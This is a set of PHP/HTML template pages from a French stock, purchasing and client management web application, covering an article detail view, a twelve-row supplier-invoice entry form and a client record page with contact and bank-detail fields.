</div>
<br>
<div class="row">
<div class="col-md-12">
<div class="grid simple">
<div class="grid-title no-border">
<h4>Article - <span class="semi-bold">Descriptif et caracteristique</span></h4>
<div class="tools"> <a class="collapse" href="javascript:;"></a> <a class="config" data-toggle="modal" href="#grid-config"></a> <a class="reload" href="javascript:;"></a> <a class="remove" href="javascript:;"></a> </div>
</div>
<div class="grid-body no-border">
<div class="row-fluid">
<div class="slimScrollDiv" style="position: relative; overflow: hidden; width: auto; height: 220px;"><div data-always-visible="1" data-height="220px" class="scroller" style="overflow: hidden; width: auto; height: 220px;">
<table width="100%">
<?php echo $donnee_article['desc_long']; ?>
</table>
</div><div class="slimScrollBar ui-draggable" style="background: none repeat scroll 0% 0% rgb(161, 178, 189); width: 7px; position: absolute; top: 0px; opacity: 0.4; display: block; border-radius: 7px; z-index: 99; right: 1px; height: 166.897px;"></div><div class="slimScrollRail" style="width: 7px; height: 100%; position: absolute; top: 0px; display: none; border-radius: 7px; background: none repeat scroll 0% 0% rgb(51, 51, 51); opacity: 0.2; z-index: 90; right: 1px;"></div></div>
</div>
</div>
</div>
</div>
</div>
<h4>Article - <span class="semi-bold">Stock et Tarif</span></h4>
<div class="row">
<div class="col-md-6">
<div class="grid simple">
<div class="grid-title no-border">
<h4>Article - <span class="semi-bold">Stock</span></h4>
<div class="tools"> <a class="collapse" href="javascript:;"></a> <a class="config" data-toggle="modal" href="#grid-config"></a> <a class="reload" href="javascript:;"></a> <a class="remove" href="javascript:;"></a> </div>
</div>
<div class="grid-body no-border">
<div class="row-fluid">
<div class="slimScrollDiv" style="position: relative; overflow: hidden; width: auto; height: 220px;"><div data-always-visible="1" data-height="220px" class="scroller" style="overflow: hidden; width: auto; height: 220px;">
<div class="row spacing-bottom 2col">
<div class="col-md-6 col-sm-6 spacing-bottom">
<div class="tiles red added-margin">
<div class="tiles-body">
<div class="controller"> <a class="reload" href="javascript:;"></a> <a class="remove" href="javascript:;"></a> </div>
<div class="tiles-title"> Stock Minimal </div>
<div class="heading"><span data-animation-duration="1200" data-value="<?php echo $donnee_article['stock_minima']; ?>" class="animate-number"><?php echo $donnee_article['stock_minima']; ?></span> </div>
</div>
</div>
</div>
<div class="col-md-6 col-sm-6">
<div class="tiles green added-margin">
<div class="tiles-body">
<div class="controller"> <a class="reload" href="javascript:;"></a> <a class="remove" href="javascript:;"></a> </div>
<div class="tiles-title"> Stock Réel </div>
<div class="row-fluid">
<div class="heading"> <span data-animation-duration="700" data-value="<?php echo $donnee_article['stock_reel']; ?>" class="animate-number"><?php echo $donnee_article['stock_reel']; ?></span> </div>
</div>
</div>
</div>
</div>
</div>
<?php
if($donnee_article['stock_reel'] == 0){echo "<h2><font color=red>Veuillez Commander le produit</font></h2>";}else{echo "";}
?>
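<?php
/*
Sketch only (not wired in): the alert above fires only once stock is exactly
zero, although the page already displays a stock_minima threshold. Comparing
against that minimum would warn before the article actually runs out:

if ($donnee_article['stock_reel'] <= $donnee_article['stock_minima']) {
	echo "<h2><font color=red>Veuillez Commander le produit</font></h2>";
}
*/
?>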
</div><div class="slimScrollBar ui-draggable" style="background: none repeat scroll 0% 0% rgb(161, 178, 189); width: 7px; position: absolute; top: 0px; opacity: 0.4; display: block; border-radius: 7px; z-index: 99; right: 1px; height: 166.897px;"></div><div class="slimScrollRail" style="width: 7px; height: 100%; position: absolute; top: 0px; display: none; border-radius: 7px; background: none repeat scroll 0% 0% rgb(51, 51, 51); opacity: 0.2; z-index: 90; right: 1px;"></div></div>
</div>
<table width="100%">
<tr>
<td>Numéro de Série: <b><?php echo $donnee_article['num_serie']; ?></b></td>
<td>Code Barre: <b><?php echo $donnee_article['code_barre']; ?></b></td>
<td>Poids: <b><?php echo $donnee_article['poids']; ?></b></td>
</tr>
</table>
</div>
</div>
</div>
<div class="col-md-6">
<div class="grid simple">
<div class="grid-title no-border">
<h4>Article - <span class="semi-bold">Tarif</span></h4>
<div class="tools"> <a class="collapse" href="javascript:;"></a> <a class="config" data-toggle="modal" href="#grid-config"></a> <a class="reload" href="javascript:;"></a> <a class="remove" href="javascript:;"></a> </div>
</div>
<div class="grid-body no-border">
<div class="row-fluid">
<div class="slimScrollDiv" style="position: relative; overflow: hidden; width: auto; height: 220px;"><div data-always-visible="1" data-height="220px" class="scroller" style="overflow: hidden; width: auto; height: 220px;">
<table width="100%">
<tr>
<th>Prix Achat HT</th>
<th>Prix Vente HT</th>
<th>Prix Vente TTC</th>
</tr>
<tr>
<td><?php echo $donnee_article['prix_achat_ht']; ?> €</td>
<td><?php echo $donnee_article['prix_vente_ht']; ?> €</td>
<td><h2><b><?php echo $donnee_article['prix_vente_ttc']; ?> €</b></h2></td>
</tr>
</table>
</div><div class="slimScrollBar ui-draggable" style="background: none repeat scroll 0% 0% rgb(161, 178, 189); width: 7px; position: absolute; top: 0px; opacity: 0.4; display: block; border-radius: 7px; z-index: 99; right: 1px; height: 166.897px;"></div><div class="slimScrollRail" style="width: 7px; height: 100%; position: absolute; top: 0px; display: none; border-radius: 7px; background: none repeat scroll 0% 0% rgb(51, 51, 51); opacity: 0.2; z-index: 90; right: 1px;"></div></div>
</div>
</div>
</div>
</div>
</div>
<div class="row">
<div class="col-md-12">
<div class="grid simple">
<div class="grid-title no-border">
<h4>Article - <span class="semi-bold">Images</span></h4>
<div class="tools"> <a class="collapse" href="javascript:;"></a> <a class="config" data-toggle="modal" href="#grid-config"></a> <a class="reload" href="javascript:;"></a> <a class="remove" href="javascript:;"></a> </div>
</div>
<div class="grid-body no-border">
<div class="row-fluid">
<div class="slimScrollDiv" style="position: relative; overflow: hidden; width: auto; height: 220px;"><div data-always-visible="1" data-height="220px" class="scroller" style="overflow: hidden; width: auto; height: 220px;">
<img width="300px" height="235px" src="<?php echo $donnee_article['images']; ?>" />
<img width="150px" height="115px" src="<?php echo $donnee_article['images2']; ?>" />
<img width="150px" height="115px" src="<?php echo $donnee_article['images3']; ?>" />
</div><div class="slimScrollBar ui-draggable" style="background: none repeat scroll 0% 0% rgb(161, 178, 189); width: 7px; position: absolute; top: 0px; opacity: 0.4; display: block; border-radius: 7px; z-index: 99; right: 1px; height: 166.897px;"></div><div class="slimScrollRail" style="width: 7px; height: 100%; position: absolute; top: 0px; display: none; border-radius: 7px; background: none repeat scroll 0% 0% rgb(51, 51, 51); opacity: 0.2; z-index: 90; right: 1px;"></div></div>
</div>
</div>
</div>
</div>
</div>
<br>
<br><br>
</div>
<!-- END PAGE -->
</div>
</div>
<!-- END CHAT -->
<!-- END CONTAINER -->
<!-- BEGIN CORE JS FRAMEWORK-->
<script src="assets/plugins/jquery-1.8.3.min.js" type="text/javascript"></script>
<script src="assets/plugins/jquery-ui/jquery-ui-1.10.1.custom.min.js" type="text/javascript"></script>
<script src="assets/plugins/boostrapv3/js/bootstrap.min.js" type="text/javascript"></script>
<script src="assets/plugins/breakpoints.js" type="text/javascript"></script>
<script src="assets/plugins/jquery-unveil/jquery.unveil.min.js" type="text/javascript"></script>
<script src="assets/plugins/jquery-block-ui/jqueryblockui.js" type="text/javascript"></script>
<!-- END CORE JS FRAMEWORK -->
<!-- BEGIN PAGE LEVEL JS -->
<script src="assets/plugins/pace/pace.min.js" type="text/javascript"></script>
<script src="assets/plugins/jquery-slider/jquery.sidr.min.js" type="text/javascript"></script>
<script src="assets/plugins/jquery-numberAnimate/jquery.animateNumbers.js" type="text/javascript"></script>
<script src="assets/plugins/jquery-slimscroll/jquery.slimscroll.min.js" type="text/javascript"></script>
<!-- END PAGE LEVEL PLUGINS -->
<!-- PAGE JS -->
<script src="assets/js/tabs_accordian.js" type="text/javascript"></script>
<!-- BEGIN CORE TEMPLATE JS -->
<script src="assets/js/core.js" type="text/javascript"></script>
<script src="assets/js/chat.js" type="text/javascript"></script>
<script src="assets/js/demo.js" type="text/javascript"></script>
<!-- END CORE TEMPLATE JS -->
</body>
</html><file_sep><?php
include ('../../../inc/header.php');
include ('../../../inc/pagecontainer.php');
$date = date("d-m-Y");
$date_30 = date('d-m-Y', strtotime("+30 days"));
?>
<script type="text/javascript">
$("#date").mask("99/99/9999");
</script>
<!-- BEGIN PAGE CONTAINER-->
<div class="page-content">
<!-- BEGIN SAMPLE PORTLET CONFIGURATION MODAL FORM-->
<div id="portlet-config" class="modal hide">
<div class="modal-header">
<button data-dismiss="modal" class="close" type="button"></button>
<h3>Widget Settings</h3>
</div>
<div class="modal-body"> Widget settings form goes here </div>
</div>
<div class="clearfix"></div>
<div class="content">
<ul class="breadcrumb">
<li>
<p>VOUS ETES ICI</p>
</li>
<li><a href="#">Achat</a> </li>
<li><a href="index.php">Facture</a></li>
<li><a href="nouv.facture.php" class="active"><span class="semi-bold">Nouvelle Facture</span></a></li>
</ul>
<div class="page-title"> <i class="icon-custom-left"></i>
<h3>ACHAT - <span class="semi-bold">Nouvelle Facture</span></h3>
</div>
<div class="row">
<div class="col-md-12">
<div class="grid simple transparent">
<div class="grid-title">
<h4>Nouvelle <span class="semi-bold">Facture</span></h4>
<div class="tools"> <a href="javascript:;" class="collapse"></a> <a href="#grid-config" data-toggle="modal" class="config"></a> <a href="javascript:;" class="reload"></a> <a href="javascript:;" class="remove"></a> </div>
</div>
<div class="grid-body ">
<div class="row">
<form id="commentForm" action="valid.nouv.facture.php" method="post">
<div id="rootwizard" class="col-md-12">
<div class="form-wizard-steps">
<ul class="wizard-steps">
<li class="" data-target="#step1"> <a href="#tab1" data-toggle="tab"> <span class="step">1</span> <span class="title">Générale</span> </a> </li>
<li data-target="#step2" class=""> <a href="#tab2" data-toggle="tab"> <span class="step">2</span> <span class="title">Article</span> </a> </li>
</ul>
<div class="clearfix"></div>
</div>
<div class="tab-content transparent">
<div class="tab-pane" id="tab1"> <br>
<h4 class="semi-bold">Etape 1 - <span class="light">Générale</span></h4>
<br>
<div class="row form-row">
<div class="col-md-12">
<label>Fournisseur</label>
<select name="idfournisseur" class="form-control no-boarder " placeholder="Civilité">
<?php
$sql_fournisseur = mysql_query("SELECT * FROM fournisseur");
while($donnee_fournisseur = mysql_fetch_array($sql_fournisseur))
{
?>
<option value="<?php echo $donnee_fournisseur['idfournisseur']; ?>"><?php echo $donnee_fournisseur['raison_social']; ?></option>
<?php } ?>
</select>
</div>
</div>
<div class="row form-row">
<div class="col-md-6">
<div class="input-append success date col-md-10 col-lg-6 no-padding">
<label>Date de la facture</label>
<input type="text" class="form-control" name="date_fact_four" Value="<?php echo $date; ?>">
<span class="add-on"><span class="arrow"></span><i class="fa fa-th"></i></span> </div>
<br>
<br>
<div class="clearfix"></div>
</div>
<div class="col-md-6">
<div class="input-append success date col-md-10 col-lg-6 no-padding">
<label>Date d'échéance</label>
<input type="text" class="form-control" name="date_echeance_fact_four" Value="<?php echo $date_30; ?>">
<span class="add-on"><span class="arrow"></span><i class="fa fa-th"></i></span> </div>
<br>
<br>
<div class="clearfix"></div>
</div>
</div>
<div class="row form-row">
<div class="col-md-6">
<label>Numéro de commande fournisseur (sans extension)</label>
<input type="text" id="txtFirstName" name="idcmdfour" class="form-control no-boarder " placeholder="Numéro de commande fournisseur">
</div>
<div class="col-md-6">
<label>Numéro de reception fournisseur (sans extension)</label>
<input type="text" id="txtLastName" name="idreceptionfour" class="form-control no-boarder " placeholder="Numéro de reception fournisseur">
</div>
</div>
</div>
<div class="tab-pane" id="tab2"> <br>
<h4 class="semi-bold">Etape 2 - <span class="light">ARTICLE</span></h4>
<br>
<div class="row form-row">
<table class="table table-bordered no-more-tables">
<thead>
<tr>
<th class="text-center" style="width:12%">Article</th>
<th class="text-center" style="width:22%">Quantité</th>
<th class="text-center" style="width:22%">Prix Prix total HT</th>
</tr>
</thead>
<tbody>
<tr>
<td class="text-center">
<select name="idarticle1" class="form-control no-boarder">
<option value="">Sélectionner un article</option>
<?php
$sql_article = mysql_query("SELECT * FROM article");
while($donnee_article = mysql_fetch_array($sql_article))
{
?>
<option value="<?php echo $donnee_article['desc_court']; ?>"><?php echo $donnee_article['desc_court']; ?> - <?php echo $donnee_article['prix_vente_ht']; ?> €</option>
<?php } ?>
</select>
</td>
<td class="text-right">
<div class="col-md-12">
<input type="text" placeholder="Qte" class="form-control no-boarder" name="qte1" id="qte1">
</div>
</td>
<td class="text-right">
<div class="col-md-12">
<input type="text" placeholder="PTHT" class="form-control no-boarder" name="prix_vente_ht1" id="prix_vente_ht1">
</div>
</td>
</tr>
<tr>
<td class="text-center">
<select name="idarticle2" class="form-control no-boarder">
<option value="">Sélectionner un article</option>
<?php
$sql_article = mysql_query("SELECT * FROM article");
while($donnee_article = mysql_fetch_array($sql_article))
{
?>
<option value="<?php echo $donnee_article['desc_court']; ?>"><?php echo $donnee_article['desc_court']; ?> - <?php echo $donnee_article['prix_vente_ht']; ?> €</option>
<?php } ?>
</select>
</td>
<td class="text-right">
<div class="col-md-12">
<input type="text" placeholder="Qte" class="form-control no-boarder" name="qte2" id="qte2">
</div>
</td>
<td class="text-right">
<div class="col-md-12">
<input type="text" placeholder="PTHT" class="form-control no-boarder" name="prix_vente_ht2" id="prix_vente_ht2">
</div>
</td>
</tr>
<tr>
<td class="text-center">
<select name="idarticle3" class="form-control no-boarder">
<option value="">Sélectionner un article</option>
<?php
$sql_article = mysql_query("SELECT * FROM article");
while($donnee_article = mysql_fetch_array($sql_article))
{
?>
<option value="<?php echo $donnee_article['desc_court']; ?>"><?php echo $donnee_article['desc_court']; ?> - <?php echo $donnee_article['prix_vente_ht']; ?> €</option>
<?php } ?>
</select>
</td>
<td class="text-right">
<div class="col-md-12">
<input type="text" placeholder="Qte" class="form-control no-boarder" name="qte3" id="qte3">
</div>
</td>
<td class="text-right">
<div class="col-md-12">
<input type="text" placeholder="PTHT" class="form-control no-boarder" name="prix_vente_ht3" id="prix_vente_ht3">
</div>
</td>
</tr>
<tr>
<td class="text-center">
<select name="idarticle4" class="form-control no-boarder">
<option value="">Sélectionner un article</option>
<?php
$sql_article = mysql_query("SELECT * FROM article");
while($donnee_article = mysql_fetch_array($sql_article))
{
?>
<option value="<?php echo $donnee_article['desc_court']; ?>"><?php echo $donnee_article['desc_court']; ?> - <?php echo $donnee_article['prix_vente_ht']; ?> €</option>
<?php } ?>
</select>
</td>
<td class="text-right">
<div class="col-md-12">
<input type="text" placeholder="Qte" class="form-control no-boarder" name="qte4" id="qte4">
</div>
</td>
<td class="text-right">
<div class="col-md-12">
<input type="text" placeholder="PTHT" class="form-control no-boarder" name="prix_vente_ht4" id="prix_vente_ht4">
</div>
</td>
</tr>
<tr>
<td class="text-center">
<select name="idarticle5" class="form-control no-boarder">
<option value="">Sélectionner un article</option>
<?php
$sql_article = mysql_query("SELECT * FROM article");
while($donnee_article = mysql_fetch_array($sql_article))
{
?>
<option value="<?php echo $donnee_article['desc_court']; ?>"><?php echo $donnee_article['desc_court']; ?> - <?php echo $donnee_article['prix_vente_ht']; ?> €</option>
<?php } ?>
</select>
</td>
<td class="text-right">
<div class="col-md-12">
<input type="text" placeholder="Qte" class="form-control no-boarder" name="qte5" id="qte5">
</div>
</td>
<td class="text-right">
<div class="col-md-12">
<input type="text" placeholder="PTHT" class="form-control no-boarder" name="prix_vente_ht5" id="prix_vente_ht5">
</div>
</td>
</tr>
<tr>
<td class="text-center">
<select name="idarticle6" class="form-control no-boarder">
<option value="">Sélectionner un article</option>
<?php
$sql_article = mysql_query("SELECT * FROM article");
while($donnee_article = mysql_fetch_array($sql_article))
{
?>
<option value="<?php echo $donnee_article['desc_court']; ?>"><?php echo $donnee_article['desc_court']; ?> - <?php echo $donnee_article['prix_vente_ht']; ?> €</option>
<?php } ?>
</select>
</td>
<td class="text-right">
<div class="col-md-12">
<input type="text" placeholder="Qte" class="form-control no-boarder" name="qte6" id="qte6">
</div>
</td>
<td class="text-right">
<div class="col-md-12">
<input type="text" placeholder="PTHT" class="form-control no-boarder" name="prix_vente_ht6" id="prix_vente_ht6">
</div>
</td>
</tr>
<tr>
<td class="text-center">
<select name="idarticle7" class="form-control no-boarder">
<option value="">Sélectionner un article</option>
<?php
$sql_article = mysql_query("SELECT * FROM article");
while($donnee_article = mysql_fetch_array($sql_article))
{
?>
<option value="<?php echo $donnee_article['desc_court']; ?>"><?php echo $donnee_article['desc_court']; ?> - <?php echo $donnee_article['prix_vente_ht']; ?> €</option>
<?php } ?>
</select>
</td>
<td class="text-right">
<div class="col-md-12">
<input type="text" placeholder="Qte" class="form-control no-boarder" name="qte7" id="qte7">
</div>
</td>
<td class="text-right">
<div class="col-md-12">
<input type="text" placeholder="PTHT" class="form-control no-boarder" name="prix_vente_ht7" id="prix_vente_ht7">
</div>
</td>
</tr>
<tr>
<td class="text-center">
<select name="idarticle8" class="form-control no-boarder">
<option value="">Sélectionner un article</option>
<?php
$sql_article = mysql_query("SELECT * FROM article");
while($donnee_article = mysql_fetch_array($sql_article))
{
?>
<option value="<?php echo $donnee_article['desc_court']; ?>"><?php echo $donnee_article['desc_court']; ?> - <?php echo $donnee_article['prix_vente_ht']; ?> €</option>
<?php } ?>
</select>
</td>
<td class="text-right">
<div class="col-md-12">
<input type="text" placeholder="Qte" class="form-control no-boarder" name="qte8" id="qte8">
</div>
</td>
<td class="text-right">
<div class="col-md-12">
<input type="text" placeholder="PTHT" class="form-control no-boarder" name="prix_vente_ht8" id="prix_vente_ht8">
</div>
</td>
</tr>
<tr>
<td class="text-center">
<select name="idarticle9" class="form-control no-boarder">
<option value="">Sélectionner un article</option>
<?php
$sql_article = mysql_query("SELECT * FROM article");
while($donnee_article = mysql_fetch_array($sql_article))
{
?>
<option value="<?php echo $donnee_article['desc_court']; ?>"><?php echo $donnee_article['desc_court']; ?> - <?php echo $donnee_article['prix_vente_ht']; ?> €</option>
<?php } ?>
</select>
</td>
<td class="text-right">
<div class="col-md-12">
<input type="text" placeholder="Qte" class="form-control no-boarder" name="qte9" id="qte9">
</div>
</td>
<td class="text-right">
<div class="col-md-12">
<input type="text" placeholder="PTHT" class="form-control no-boarder" name="prix_vente_ht9" id="prix_vente_ht9">
</div>
</td>
</tr>
<tr>
<td class="text-center">
<select name="idarticle10" class="form-control no-boarder">
<option value="">Sélectionner un article</option>
<?php
$sql_article = mysql_query("SELECT * FROM article");
while($donnee_article = mysql_fetch_array($sql_article))
{
?>
<option value="<?php echo $donnee_article['desc_court']; ?>"><?php echo $donnee_article['desc_court']; ?> - <?php echo $donnee_article['prix_vente_ht']; ?> €</option>
<?php } ?>
</select>
</td>
<td class="text-right">
<div class="col-md-12">
<input type="text" placeholder="Qte" class="form-control no-boarder" name="qte10" id="qte10">
</div>
</td>
<td class="text-right">
<div class="col-md-12">
<input type="text" placeholder="PTHT" class="form-control no-boarder" name="prix_vente_ht10" id="prix_vente_ht10">
</div>
</td>
</tr>
<tr>
<td class="text-center">
<select name="idarticle11" class="form-control no-boarder">
<option value="">Sélectionner un article</option>
<?php
$sql_article = mysql_query("SELECT * FROM article");
while($donnee_article = mysql_fetch_array($sql_article))
{
?>
<option value="<?php echo $donnee_article['desc_court']; ?>"><?php echo $donnee_article['desc_court']; ?> - <?php echo $donnee_article['prix_vente_ht']; ?> €</option>
<?php } ?>
</select>
</td>
<td class="text-right">
<div class="col-md-12">
<input type="text" placeholder="Qte" class="form-control no-boarder" name="qte11" id="qte11">
</div>
</td>
<td class="text-right">
<div class="col-md-12">
<input type="text" placeholder="PTHT" class="form-control no-boarder" name="prix_vente_ht11" id="prix_vente_ht11">
</div>
</td>
</tr>
<tr>
<td class="text-center">
<select name="idarticle12" class="form-control no-boarder">
<option value="">Sélectionner un article</option>
<?php
$sql_article = mysql_query("SELECT * FROM article");
while($donnee_article = mysql_fetch_array($sql_article))
{
?>
<option value="<?php echo $donnee_article['desc_court']; ?>"><?php echo $donnee_article['desc_court']; ?> - <?php echo $donnee_article['prix_vente_ht']; ?> €</option>
<?php } ?>
</select>
</td>
<td class="text-right">
<div class="col-md-12">
<input type="text" placeholder="Qte" class="form-control no-boarder" name="qte12" id="qte12">
</div>
</td>
<td class="text-right">
<div class="col-md-12">
<input type="text" placeholder="PTHT" class="form-control no-boarder" name="prix_vente_ht12" id="prix_vente_ht12">
</div>
</td>
</tr>
<tr>
<td></td>
<td>Remise</td>
<td><input type="text" placeholder="remise" class="form-control no-boarder " name="remise" id="txtFirstName"></td>
</tr>
<tr>
<td></td>
<td>Frais de Port</td>
<td><input type="text" placeholder="Frais de Port" class="form-control no-boarder " name="port" id="txtFirstName"></td>
</tr>
<tr>
<td></td>
<td>Eco Participation</td>
<td><input type="text" placeholder="Eco-Participation" class="form-control no-boarder " name="eco-part" id="txtFirstName"></td>
</tr>
</tbody>
</table>
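<?php
/*
Refactoring sketch (assumption: valid.nouv.facture.php keeps reading the
fields idarticle1..12, qte1..12 and prix_vente_ht1..12): the twelve rows
above are identical except for their index, so they could be emitted in a
loop instead of being copy-pasted, e.g.:

for ($i = 1; $i <= 12; $i++) {
	echo '<tr><td class="text-center">';
	echo '<select name="idarticle' . $i . '" class="form-control no-boarder">';
	// ... same article <option> loop as above ...
	echo '</select></td>';
	echo '<td class="text-right"><div class="col-md-12"><input type="text" placeholder="Qte" class="form-control no-boarder" name="qte' . $i . '"></div></td>';
	echo '<td class="text-right"><div class="col-md-12"><input type="text" placeholder="PTHT" class="form-control no-boarder" name="prix_vente_ht' . $i . '"></div></td>';
	echo '</tr>';
}
*/
?>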
<center>
<button class="btn btn-primary btn-cons" type="submit">Valider</button>
<button class="btn btn-danger btn-cons" type="reset">Reset</button>
</center>
</div>
</div>
<ul class=" wizard wizard-actions">
<li class="previous first" style="display:none;"><a href="javascript:;" class="btn"> First </a></li>
<li class="previous"><a href="javascript:;" class="btn"> Previous </a></li>
<li class="next last" style="display:none;"><a href="javascript:;" class="btn btn-primary"> Last </a></li>
<li class="next"><a href="javascript:;" class="btn btn-primary"> Next </a></li>
</ul>
</div>
</div>
</form>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
<!-- END PAGE -->
<!-- END CONTAINER -->
<!-- BEGIN CORE JS FRAMEWORK-->
<script src="<?php echo $rootsite; ?>assets/plugins/jquery-1.8.3.min.js" type="text/javascript"></script>
<script src="<?php echo $rootsite; ?>assets/plugins/jquery-ui/jquery-ui-1.10.1.custom.min.js" type="text/javascript"></script>
<script src="<?php echo $rootsite; ?>assets/plugins/bootstrap/js/bootstrap.min.js" type="text/javascript"></script>
<script src="<?php echo $rootsite; ?>assets/plugins/breakpoints.js" type="text/javascript"></script>
<script src="<?php echo $rootsite; ?>assets/plugins/jquery-unveil/jquery.unveil.min.js" type="text/javascript"></script>
<!-- END CORE JS FRAMEWORK -->
<!-- BEGIN PAGE LEVEL JS -->
<script src="<?php echo $rootsite; ?>assets/plugins/jquery-slider/jquery.sidr.min.js" type="text/javascript"></script>
<script src="<?php echo $rootsite; ?>assets/plugins/jquery-block-ui/jqueryblockui.js" type="text/javascript"></script>
<script src="<?php echo $rootsite; ?>assets/plugins/jquery-numberAnimate/jquery.animateNumbers.js" type="text/javascript"></script>
<script src="<?php echo $rootsite; ?>assets/plugins/pace/pace.min.js" type="text/javascript"></script>
<script src="<?php echo $rootsite; ?>assets/plugins/bootstrap-datepicker/js/bootstrap-datepicker.js" type="text/javascript"></script>
<script src="<?php echo $rootsite; ?>assets/plugins/bootstrap-select2/select2.min.js" type="text/javascript"></script>
<script src="<?php echo $rootsite; ?>assets/plugins/jquery-slimscroll/jquery.slimscroll.min.js" type="text/javascript"></script>
<script src="<?php echo $rootsite; ?>assets/plugins/boostrap-form-wizard/js/jquery.bootstrap.wizard.min.js" type="text/javascript"></script>
<script src="<?php echo $rootsite; ?>assets/plugins/jquery-validation/js/jquery.validate.min.js" type="text/javascript"></script>
<script src="<?php echo $rootsite; ?>assets/plugins/jquery-inputmask/jquery.inputmask.min.js" type="text/javascript"></script>
<!-- END PAGE LEVEL PLUGINS -->
<script src="<?php echo $rootsite; ?>assets/js/form_validations.js" type="text/javascript"></script>
<script src="<?php echo $rootsite; ?>assets/js/form_elements.js" type="text/javascript"></script>
<!-- BEGIN CORE TEMPLATE JS -->
<script src="<?php echo $rootsite; ?>assets/js/core.js" type="text/javascript"></script>
<script src="<?php echo $rootsite; ?>assets/js/demo.js" type="text/javascript"></script>
<!-- END CORE TEMPLATE JS -->
<!-- END JAVASCRIPTS -->
</body>
</html><file_sep><?php
include ('../../../inc/header.php');
include ('../../../inc/pagecontainer.php');
$idclient = (int) $_GET['idclient']; // cast to int so the id cannot be used for SQL injection
$sql_client = mysql_query("SELECT * FROM client WHERE idclient=$idclient");
$donnee_client = mysql_fetch_array($sql_client);
$date = date("d-m-Y");
?>
<!-- BEGIN PAGE CONTAINER-->
<div class="page-content">
<!-- BEGIN SAMPLE PORTLET CONFIGURATION MODAL FORM-->
<div id="portlet-config" class="modal hide">
<div class="modal-header">
<button data-dismiss="modal" class="close" type="button"></button>
<h3>Widget Settings</h3>
</div>
<div class="modal-body"> Widget settings form goes here </div>
</div>
<div class="clearfix"></div>
<div class="content">
<ul class="breadcrumb">
<li><p>Vous êtes Ici</p></li>
<li><a href="index.php">Client</a></li>
<li><a href="#" class="active">Fiche Client - <?php echo $donnee_client['nom']; ?> <?php echo $donnee_client['prenom']; ?></a> </li>
</ul>
<div class="page-title"> <i class="icon-custom-left"></i>
<h3>Client - <span class="semi-bold">CLI000<?php echo $donnee_client['idclient']; ?> - <?php echo $donnee_client['nom']; ?> <?php echo $donnee_client['prenom']; ?></span></h3>
</div>
<br>
<div class="row">
<div class="col-md-12">
<div class="grid simple">
<div class="grid-title no-border">
<h4>Client - <span class="semi-bold">Général</span></h4>
<div class="tools"> <a class="collapse" href="javascript:;"></a> <a class="config" data-toggle="modal" href="#grid-config"></a> <a class="reload" href="javascript:;"></a> <a class="remove" href="javascript:;"></a> </div>
</div>
<div class="grid-body no-border">
<div class="row-fluid">
<table width="100%">
<tr>
<td width="50%">N° Client:</td>
<td width="50%">CLI000<?php echo $donnee_client['idclient']; ?></td>
</tr>
<tr>
<td width="50%">Raison social:</td>
<td width="50%"><?php echo $donnee_client['raison_social']; ?></td>
</tr>
<tr>
<td width="50%">Identité:</td>
<td width="50%"><?php echo $donnee_client['nom']; ?> <?php echo $donnee_client['prenom']; ?></td>
</tr>
<tr>
<td>Adresse:</td>
<td>
<?php echo $donnee_client['adresse1']; ?><br>
<?php echo $donnee_client['adresse2']; ?><br>
<?php echo $donnee_client['cp']; ?> <?php echo $donnee_client['ville']; ?>
</td>
</tr>
<tr>
<td>Téléphone:</td>
<td><?php echo $donnee_client['tel']; ?></td>
</tr>
<tr>
<td>Fax:</td>
<td><?php echo $donnee_client['fax']; ?></td>
</tr>
<tr>
<td>Portable:</td>
<td><?php echo $donnee_client['port']; ?></td>
</tr>
<tr>
<td>E-Mail:</td>
<td><?php echo $donnee_client['mail']; ?></td>
</tr>
</table>
</div>
</div>
</div>
</div>
</div>
<br>
<div class="row">
<div class="col-md-12">
<div class="grid simple">
<div class="grid-title no-border">
<h4>Client - <span class="semi-bold">Finance & Paiement</span></h4>
<div class="tools"> <a class="collapse" href="javascript:;"></a> <a class="config" data-toggle="modal" href="#grid-config"></a> <a class="reload" href="javascript:;"></a> <a class="remove" href="javascript:;"></a> </div>
</div>
<div class="grid-body no-border">
<div class="row-fluid">
<div class="slimScrollDiv" style="position: relative; overflow: hidden; width: auto; height: 220px;"><div data-always-visible="1" data-height="220px" class="scroller" style="overflow: hidden; width: auto; height: 220px;">
Mode de Paiement par défaut:
<br />
<h2>RIB</h2>
<table width="100%" border="2px">
<tr>
<th>Code Banque</th>
<th>Code Guichet</th>
<th>N° de Compte</th>
<th>Clé RIB</th>
</tr>
<tr>
<td><?php echo $donnee_client['code_banque']; ?></td>
<td><?php echo $donnee_client['code_guichet']; ?></td>
<td><?php echo $donnee_client['code_cpt']; ?></td>
<td><?php echo $donnee_client['cle_rib']; ?></td>
</tr>
</table>
<br />
<table width="100%" border="2px">
<tr>
<th width="70%">IBAN</th>
<th width="30%">BIC (swift)</th>
</tr>
<tr>
<td><?php echo $donnee_client['iban']; ?></td>
<td><?php echo $donnee_client['bic']; ?></td>
</tr>
</table>
<br />
<table width="100%" border="2px">
<tr>
<td>Encours:</td>
<td><?php echo $donnee_client['encour']; ?> €</td>
</tr>
</table>
</div><div class="slimScrollBar ui-draggable" style="background: none repeat scroll 0% 0% rgb(161, 178, 189); width: 7px; position: absolute; top: 0px; opacity: 0.4; display: block; border-radius: 7px; z-index: 99; right: 1px; height: 166.897px;"></div><div class="slimScrollRail" style="width: 7px; height: 100%; position: absolute; top: 0px; display: none; border-radius: 7px; background: none repeat scroll 0% 0% rgb(51, 51, 51); opacity: 0.2; z-index: 90; right: 1px;"></div></div>
</div>
</div>
</div>
</div>
</div>
<br>
<br><br>
</div>
<!-- END PAGE -->
</div>
</div>
<!-- END CHAT -->
<!-- END CONTAINER -->
<!-- BEGIN CORE JS FRAMEWORK-->
<script src="assets/plugins/jquery-1.8.3.min.js" type="text/javascript"></script>
<script src="assets/plugins/jquery-ui/jquery-ui-1.10.1.custom.min.js" type="text/javascript"></script>
<script src="assets/plugins/boostrapv3/js/bootstrap.min.js" type="text/javascript"></script>
<script src="assets/plugins/breakpoints.js" type="text/javascript"></script>
<script src="assets/plugins/jquery-unveil/jquery.unveil.min.js" type="text/javascript"></script>
<script src="assets/plugins/jquery-block-ui/jqueryblockui.js" type="text/javascript"></script>
<!-- END CORE JS FRAMEWORK -->
<!-- BEGIN PAGE LEVEL JS -->
<script src="assets/plugins/pace/pace.min.js" type="text/javascript"></script>
<script src="assets/plugins/jquery-slider/jquery.sidr.min.js" type="text/javascript"></script>
<script src="assets/plugins/jquery-numberAnimate/jquery.animateNumbers.js" type="text/javascript"></script>
